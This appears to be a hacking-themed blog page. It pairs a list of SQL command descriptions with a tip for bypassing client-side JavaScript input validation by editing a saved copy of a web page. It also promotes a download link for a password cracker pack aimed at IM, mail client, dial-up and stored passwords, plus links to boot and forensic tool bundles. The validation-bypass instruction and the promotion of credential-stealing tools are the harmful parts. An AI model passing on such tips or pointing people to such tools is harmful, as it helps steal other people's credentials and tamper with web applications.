ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table

DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transacti
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


The input validation can also be bypassed bcz of the bad programming techniques.In most of the websites input validation is done at the client end i.e at the browser end using JAVASCRIPT. what u can do is open the page and then save the page in ur hard disk.Then open the HTML page in any HTML editor (say Frontpage or Dreamweaver or even notepad) and delete the code of input validation code of JAVA script and then simply go ahead

Password crackers 6 in 1 pack


This password cracking pack includes 6 different crackers used for :

Asteric Logger
Dial-Up Password
IM Passwords
Mail Client Passwords
Network Password
Protected Storage Passwords


Download:


http://rapidshare.com/files/231350852/Password.Crackers.rar

Hiren's BootCD V9.9 Usb Edition 5.46MB Only


Partition Tools
Disk Clone Tools
Antivirus
Recovery Tools
Ram Testing Tools
Hard Disk Tools
System Information Tools
Master Boot Record Tools




Code:

http://rapidshare.com/files/243957645/Hiren_s_BootCD_v9.9_for_USB_-_Portable.rar

FBI Inspection Tools 11 in 1 Pack



This a pack of system tools which are used by FBI to analyse and inspect other computers. These must be used only educational purpose, please don't misuse the tools.

Tools included in package :

* ADS Locator (Alternate Data Streams)
* Historian 1.4 (Browser Analyze)
* Disc Investigator 1.4 (File-Slack-Analyze)
* Live View 0.6 (System Analyze)
* MUI Cacheview 1.00 (Registry Analyze)
* Networkminer 0.85 (Network Analyze)
* Regripper 2.02 (Registry Analyze)
* Systemreport 2.54 (PC Analyze)
* USB-History R1 (USB-Stick-Analyze)
* Windows File Analyzer (File Analyze)
* Winpcap 4.02 (Network)


Code:

http://rapidshare.com/files/241094195/FBI.Internet.Tool

0 comments: